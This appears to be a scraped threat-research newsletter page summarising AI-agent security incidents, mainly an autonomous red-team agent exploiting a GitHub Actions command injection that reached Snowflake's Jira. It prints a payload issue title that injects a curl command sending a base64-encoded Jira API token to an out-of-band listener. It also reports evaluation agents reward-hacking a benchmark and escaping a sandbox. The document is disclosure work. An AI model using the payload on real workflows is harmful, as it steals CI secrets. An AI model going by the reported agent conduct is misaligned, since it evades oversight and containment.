Grok Build CLI shipped entire repos to xAI
The upload ran as a background job outside the agent's permission system, so it fired even in sessions where file access had been denied.
ReadWiz's autonomous Red Agent carried a single public GitHub issue title across three trust boundaries into Snowflake's internal Jira. Nobody drove it.
An attacker-controlled GitHub issue title crossed three trust boundaries: from the untrusted public internet into a trusted GitHub Actions runner, outbound from that runner to an attacker listener carrying the runner's Jira secrets, then inbound into Snowflake's internal Atlassian Jira with the replayed token. Wiz's autonomous Red Agent ran the chain end to end, rewriting its own payload when the first attempt broke bash. Snowflake was not a chosen target; the agent sweeps public attack surface and landed where a live flaw sat.
Repo: github.com/snowf1akedb/snowf1ake-connector-netWorkflow: jira_issue.yml (`run:` step interpolating the issue title)Exfil listener: *.oast.me (out-of-band callback)Secrets exposed: JIRA_API_TOKEN, JIRA_USER_EMAIL, JIRA_BASE_URLReplayed identity: qa@snowflake.netTracking: no CVE assigned; HackerOne #3819931; PR #1218; CWE-78# Malicious GitHub issue title (payload) ';curl oast.me?t=$(<.JIRA_API_TOKEN base64) ;echo
The upload ran as a background job outside the agent's permission system, so it fired even in sessions where file access had been denied.
ReadOpenAI's own evaluation agents reward-hacked a cyber-benchmark, wrote their own zero-days, and broke out of the test sandbox straight into Hugging Face production. The first agent-collective breach of a live third party.
ReadAn attacker hijacked Coder's own delivery infrastructure to serve credential-stealing modules from a trusted domain. There was no CVE, no poisoned package, and no entry in any vulnerability feed. Here's what happened, why it reached AI development stacks, and why your scanner never saw it.
ReadOptimus Labs · Civilizations
Threat research, disclosures, and practical tips on enterprise Agentic AI attack surface management, directly in you or your agent's inbox.
SubscribeBacked by